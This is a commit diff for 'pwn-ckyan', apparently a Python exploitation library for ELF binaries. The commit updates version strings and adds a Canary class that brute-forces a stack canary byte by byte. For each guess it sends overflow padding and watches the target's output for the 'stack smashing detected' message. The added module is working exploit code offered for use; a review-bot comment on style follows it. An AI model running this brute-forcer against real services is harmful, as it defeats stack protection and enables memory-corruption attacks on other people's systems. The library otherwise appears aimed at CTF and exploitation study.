Added blasting to canary and fixed an error
1 parent
8cce7cc
commit 3f60caf
Showing
9 changed files
with
165 additions
and
10 deletions.
@@ -1,7 +1,7 @@ | ||
Metadata-Version: 2.1 | ||
Name: pwn-ckyan | ||
Version: 2.1.4 | ||
Summary: pwnScript | ||
Version: 2.1.5 | ||
Summary: pwnScript is a tools for exploiting vuln in ELF files. | ||
Home-page: https://github.com/c0mentropy/ckyan.pwnScript | ||
Author: Comentropy Ckyan | ||
Author-email: [email protected] | ||
|
|
@@ -5,3 +5,4 @@ | |
from .ae64_opcode import * | ||
from .stack import * | ||
from .awd import * | ||
from .canary import * |
|
@@ -11,7 +11,7 @@ | |
| (__| <| |_| | (_| | | | |_| |_) \ V V /| | | |___) | (__| | | | |_) | |_ | ||
\___|_|\_\\__, |\__,_|_| |_(_) .__/ \_/\_/ |_| |_|____/ \___|_| |_| .__/ \__| | ||
|___/ |_| |_| | ||
PwnScript version: 2.1.4""" + "\n\n" | ||
PwnScript version: 2.1.5""" + "\n\n" | ||
|
||
|
||
class CliParser: | ||
|
@@ -27,7 +27,7 @@ def __init__(self): | |
|
||
def set_parse_arguments(self): | ||
|
||
VERSION = "PwnScript: version 2.1.4\n" \ | ||
VERSION = "PwnScript: version 2.1.5\n" \ | ||
"Author: Comentropy Ckyan\n" \ | ||
"Email: [email protected]\n" \ | ||
"GitHub: https://github.com/c0mentropy/ckyan.pwnScript\n" | ||
|
@@ -0,0 +1,55 @@ | ||
from pwn import p8 | ||
from ..misc import r, ru, rp, s, sl, uu64, log_canary | ||
from ..log4ck import debug | ||
|
||
|
||
class Canary: | ||
def __init__(self): | ||
self.value: bytes = b"" | ||
self.padding = 0 | ||
|
||
self.send_after_str = b'' | ||
self.stack_overflow_str = b'*** stack smashing detected ***: terminated' | ||
|
||
def set_padding(self, padding: int): | ||
self.padding = padding | ||
|
||
def find_full_canary(self, padding: int = 0, send_after_str: bytes = b'', stack_overflow_str: bytes = b'***', | ||
length: int = 8, initial_canary: bytes = b'\x00', recv_length: int = 0, | ||
is_line: bool = False) -> bytes: | ||
|
||
self.padding = padding | ||
self.send_after_str = send_after_str | ||
self.stack_overflow_str = stack_overflow_str | ||
|
||
canary = initial_canary | ||
for index in range(1, length): # We start from 1 since we have the initial 0 byte | ||
canary = self._find_canary_byte(canary, recv_length, is_line) | ||
debug(f"Current canary: {canary}") | ||
|
||
self.value = canary | ||
log_canary(uu64(canary)) | ||
|
||
return self.value | ||
|
||
def _find_canary_byte(self, current_canary: bytes, recv_length: int, is_line: bool): | ||
|
||
for canary_byte_i in range(0xff): | ||
|
||
attempt_canary = current_canary + p8(canary_byte_i) | ||
|
||
pad = b'a' * self.padding + attempt_canary | ||
|
||
if is_line: | ||
ru(self.send_after_str) | ||
sl(pad) | ||
else: | ||
ru(self.send_after_str) | ||
s(pad) | ||
|
||
if rp(lambda x: self.stack_overflow_str in x) != b'': | ||
continue # Incorrect byte, try the next one | ||
else: | ||
return attempt_canary # Found correct byte | ||
|
||
raise ValueError("Could not find a valid byte") # If no valid byte is found |
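Review bot: The new `Canary` class, `find_full_canary` and `_find_canary_byte` carry no docstrings, and nothing tells a caller of `find_full_canary` that it propagates the `ValueError` raised at the end of `_find_canary_byte` when no byte is accepted; a docstring such as `"""Recover the canary one byte at a time; returns it as bytes and raises ValueError if a byte cannot be recovered."""` on `find_full_canary` would make that contract explicit. Both branches of the `if is_line:` block begin with the same `ru(self.send_after_str)` call, so it can be hoisted above the `if`, leaving only `sl(pad)` and `s(pad)` in the branches. `r` is imported from `..misc` on the second import line but is never used in this file.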
@@ -1,10 +1,10 @@ | ||
from setuptools import setup, find_packages | ||
setup( | ||
name = 'pwn-ckyan', | ||
version = '2.1.4', | ||
version = '2.1.5', | ||
author = 'Comentropy Ckyan', | ||
author_email = "[email protected]", | ||
description = "pwnScript", | ||
description = "pwnScript is a tools for exploiting vuln in ELF files.", | ||
packages=find_packages(), | ||
url="https://github.com/c0mentropy/ckyan.pwnScript", | ||
license='GPL-3.0', | ||
|